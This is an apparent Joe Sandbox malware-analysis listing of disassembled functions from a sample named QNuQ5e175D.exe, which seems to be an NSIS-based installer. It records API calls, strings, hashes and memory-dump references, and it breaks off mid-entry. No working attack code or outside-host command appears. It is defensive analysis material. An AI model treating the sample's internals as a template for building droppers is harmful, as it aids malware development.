                                                          • Opcode ID: 60df8de7b5a988bccddf30cb19f0aed2b8abe1b2bc6946f7de17350774018c82
                                                          • Instruction ID: e2b1e7e4d579973d6c1d5c0edb8a0d48e304033036589873bc5ad28fd9346db5
                                                          • Opcode Fuzzy Hash: 60df8de7b5a988bccddf30cb19f0aed2b8abe1b2bc6946f7de17350774018c82
                                                          • Instruction Fuzzy Hash: 8E4126B0408706DFD724EF39E861AA677F8FB85324F108A1EEA56C7181F730A558CB61
                                                          Function 00404EB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                          • GetMessagePos.USER32 ref: 00404ED4
                                                          • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                          Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                          • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                          Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                          • MulDiv.KERNEL32(0008E45C,00000064,0008ED68), ref: 00403001
                                                          • wsprintfW.USER32 ref: 00403011
                                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                          • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                          Function 6FC42655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6FC412BB: GlobalAlloc.KERNEL32(00000040,?,6FC412DB,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412C5
                                                          • GlobalFree.KERNEL32(?), ref: 6FC42743
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC42778
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 7d750d05920ed819e3b465be0873ba9c42fc35b3c4c4940eb006bd6cb0fa13c1
                                                          • Instruction ID: 2ddfbda242d4055eab3c0f9184453ecf63cd0fee66d7574d0c423d7776b2c782
                                                          • Opcode Fuzzy Hash: 7d750d05920ed819e3b465be0873ba9c42fc35b3c4c4940eb006bd6cb0fa13c1
                                                          • Instruction Fuzzy Hash: C631F471504502DFCB169F68D9E6CAA77B6FF87364310462DF640C32A0EB316829CB65
                                                          Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                          • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                          • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                          • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                          Function 6FC41979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 1a12e9e55e3834bda6249efca24500edbac2e4a14d74188f7462202f9d6d8198
                                                          • Instruction ID: b92bcf6971c029c18e61614e23370c49878c6afabdcdd99fcbfa7a685872f2f6
                                                          • Opcode Fuzzy Hash: 1a12e9e55e3834bda6249efca24500edbac2e4a14d74188f7462202f9d6d8198
                                                          • Instruction Fuzzy Hash: 2B5117B2D04208AA8B039FBDC54469E7BB5FF41368F00925BD484E7650F770BA7987A1
                                                          Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                          • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                          Function 6FC416BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416D5
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416DC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FC422D8,?,00000808), ref: 6FC416F0
                                                          • GetProcAddress.KERNEL32(6FC422D8,00000000), ref: 6FC416F7
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41700
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 872ab9992991973ceca1e30ebcbd09f35d741037bd0d636e53a3861006f35735
                                                          • Instruction ID: 064993ab90ce7508736039fea512048af39b8a51b039846a863ea4593685b913
                                                          • Opcode Fuzzy Hash: 872ab9992991973ceca1e30ebcbd09f35d741037bd0d636e53a3861006f35735
                                                          • Instruction Fuzzy Hash: F2F037721065397FDA202AA79C4CC9B7EACEF8B2F5B110315F718D119085624C25D7F1
                                                          Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                          • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                          • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                          Function 00404DA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • wsprintfW.USER32 ref: 00404E4D
                                                          • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                          • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                          • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                          Function 00405F4E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405FA7
                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405FB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 3248276644-633902885
                                                          • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                          • Instruction ID: 6a7a19aedd3560da6e477bd72522a8c235124595f9c35bb96c459409ca5d5c37
                                                          • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                          • Instruction Fuzzy Hash: 28F0F42A105E6369C622333A5C05AAF1954CE86324B5A453FBC91F22C5CF3C8A42CDBE
                                                          Function 00405EF1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • CharNextW.USER32(00000000), ref: 00405F04
                                                          • CharNextW.USER32(00000000), ref: 00405F1C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp, xrefs: 00405EF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 3213498283-469814226
                                                          • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                          • Instruction ID: 0a1f1b5a9c7109d9782da40e5c64a20d368bd089a9add51530d5bf68f03dfa04
                                                          • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                          • Instruction Fuzzy Hash: 98F09062D00A2795DA31B7645C85A7766BCEB593A0B00807BE601B72C0D7BC48818EDA
                                                          Function 00405E46 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E4C
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E56
